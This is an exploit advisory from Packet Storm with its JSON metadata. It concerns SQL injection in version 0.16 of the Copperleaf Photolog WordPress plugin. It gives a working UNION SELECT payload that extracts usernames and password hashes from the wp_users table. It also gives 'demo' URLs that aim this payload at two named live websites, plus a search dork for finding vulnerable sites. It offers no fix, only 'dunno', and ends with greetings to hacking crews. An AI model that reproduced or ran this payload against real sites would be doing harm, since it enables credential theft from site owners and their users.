ID PACKETSTORM:86315
Type packetstorm
Reporter kaMtiEz
Modified 2010-02-15T00:00:00
Description
`#############################################################################################################
## WordPress Copperleaf Photolog SQL injection ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 15 February, 2009 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.copperleaf.org/
[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip
[+] version : 0.16 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
[ XpL]
+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--
[ DEMO ]
[+] Demo Vendor
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
[+] Demo plugins
http://ozarkedgewildflowers.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBl13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] r3m1ck : look at this .. hha
[+] Don Tukulesto : kapan maen lage ?
[+] d0ntcry : semangat br0th .. belajar terusssss ...
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
`
{"reporter": "kaMtiEz", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-11-03T10:26:51"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:51"}, "vulnersScore": 0.8}, "published": "2010-02-15T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:51", "history": [], "id": "PACKETSTORM:86315", "sourceHref": "https://packetstormsecurity.com/files/download/86315/wpcopperleaf-sql.txt", "objectVersion": "1.2", "sourceData": "`############################################################################################################# \n## WordPress Copperleaf Photolog SQL injection ## \n## Author : kaMtiEz (kamzcrew@yahoo.com) ## \n## Homepage : http://www.indonesiancoder.com ## \n## Date : 15 February, 2009 ## \n############################################################################################################# \n \n[ Software Information ] \n \n[+] Vendor : http://www.copperleaf.org/ \n[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip \n[+] version : 0.16 / lower maybe also affected \n[+] Vulnerability : SQL \n[+] Dork : \"CiHuY\" \n[+] LOCATION : INDONESIA - JOGJA \n############################################################################################################# \n \n[ Vulnerable File ] \n \nhttp://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID] \n \n[ XpL] \n \n+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users-- \n \n[ DEMO ] \n \n[+] Demo Vendor \n \nhttp://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097 \n \n[+] Demo plugins \n \nhttp://ozarkedgewildflowers.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11 \n \n[ FIX ] \n \ndunno :\"> \n \n \n############################################################################################################# \n \n[ Thx TO ] \n \n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah \n[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot \n[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBl13Z,r3m1ck \n[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk \n \n[ NOTE ] \n \n[+] r3m1ck : look at this .. hha \n[+] Don Tukulesto : kapan maen lage ? \n[+] d0ntcry : semangat br0th .. belajar terusssss ... \n \n[ QUOTE ] \n \n[+] we are not dead INDONESIANCODER stil r0x \n[+] nothing secure .. \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "WordPress Copperleaf Photolog SQL Injection", "type": "packetstorm", "modified": "2010-02-15T00:00:00", "hash": "794fdfdfabc10efdfd6317e65c8a8931a3213afed93862ad9d543a5610805492", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "f0955e4c667d429b365743ab9d4b1947", "key": "href"}, {"hash": "d3957b28e6c201d6d37ecd69e45c911b", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "d3957b28e6c201d6d37ecd69e45c911b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5dc9e8838629249a8b21d61ebfeb42d7", "key": "reporter"}, {"hash": "ecc1ca8ebe97fc6f212289b66cf5aa0e", "key": "sourceData"}, {"hash": "53a3746259235d3be48963ceeac9816d", "key": "sourceHref"}, {"hash": "db4c138ca9b9da087bd93d4e7d2a05b7", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/86315/WordPress-Copperleaf-Photolog-SQL-Injection.html", "viewCount": 2}
{}